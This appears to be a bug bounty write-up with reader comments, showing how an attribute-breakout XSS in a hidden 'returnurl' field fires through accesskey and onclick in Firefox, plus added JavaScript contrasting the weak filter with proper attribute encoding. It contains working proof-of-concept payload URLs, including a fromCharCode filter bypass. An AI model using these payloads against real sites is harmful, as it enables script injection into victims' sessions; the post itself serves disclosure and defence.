…where you have the input sanitized for '<> chars.
I come across a web application on a bounty program where the returnurl was placed in the following HTML:
[code language="html"]<input type="hidden" name="returnurl" value="[USER INJECT]" />[/code]
The security filter removed the <>' chars but kept the double quote active and reflected it.
What’s the first thing that comes to mind?
[code language="html"]http://victim/?returnurl=" onclick="prompt(1)[/code]
Oh no! Wait... This is a hidden field, so most JavaScript events can't fire because you can't see the input box, right?
Also, you can't style it to make the field visible.
What I did was quite simple. I remembered that Gareth Heyes wrote a small article on PortSwigger showing that you can use accesskey to get the XSS working: the user presses a key on the keyboard and that triggers a JavaScript event. So my injection became:
[code language="html"]http://victim/?returnurl=" accesskey="X" onclick="alert(document.domain)[/code]
Which reflected:
[code language="html"]<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />[/code]
If the victim uses the accesskey X (usually ALT+SHIFT+X on Windows or CTRL+ALT+X on OS X), the domain is shown in the JavaScript alert box. Keep in mind that this works only in Firefox.
To give a better report, and also to bypass their single-quote filter, I also sent the following XSS vector:
[code language="html"]http://victim/?returnurl=" accesskey="X" onclick="alert(String.fromCharCode(39,89,111,117,32,103,111,116,32,88,83,83,101,100,33,39))[/code]
It requires more user interaction but might give the bug appreciation program the Woooo! Factor 🙂
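As an added example (not code from the original post), here is the filter the post describes beside proper HTML attribute encoding, plus a small check that lists the attribute names in the rendered tag so the breakout is visible. The payload is the post's own; the function names are mine and the attribute extractor is deliberately minimal, not a general HTML parser.

```javascript
// Added example: the weak filter from the post (strips < > ' but leaves ")
// versus real attribute encoding, applied to the post's hidden returnurl field.

// The filter the post describes: removes only < > and the single quote.
function weakFilter(value) {
  return value.replace(/[<>']/g, '');
}

// Correct defence: encode every character that can close or alter an attribute.
function encodeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

// Renders the hidden field exactly as the post shows it.
function renderHiddenInput(value, sanitize) {
  return `<input type="hidden" name="returnurl" value="${sanitize(value)}" />`;
}

// Minimal attribute-name extractor for one tag (hypothetical helper): good
// enough to reveal an attribute breakout, not a general HTML parser.
function attributeNames(tag) {
  const names = [];
  const re = /\s([a-zA-Z-]+)="[^"]*"/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Anything beyond type/name/value on this field came from user data.
function injectedAttributes(tag) {
  const allowed = new Set(['type', 'name', 'value']);
  return attributeNames(tag).filter((n) => !allowed.has(n));
}

// Payload taken from the post (no < > or ', so the weak filter passes it through).
const payload = '" accesskey="X" onclick="alert(document.domain)';
const weakHtml = renderHiddenInput(payload, weakFilter); // gains accesskey + onclick
const safeHtml = renderHiddenInput(payload, encodeAttr); // stays a single value attribute
```

Running it shows `injectedAttributes(weakHtml)` returning `accesskey` and `onclick`, while the encoded version returns nothing extra.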
What would you do if double quotes are filtered?
” become "
‘ become '
Hi
In which browser can this XSS be inserted? I tried with Firefox 4, IE 11 and Chrome but was not able to achieve the same.
Firefox and it still works.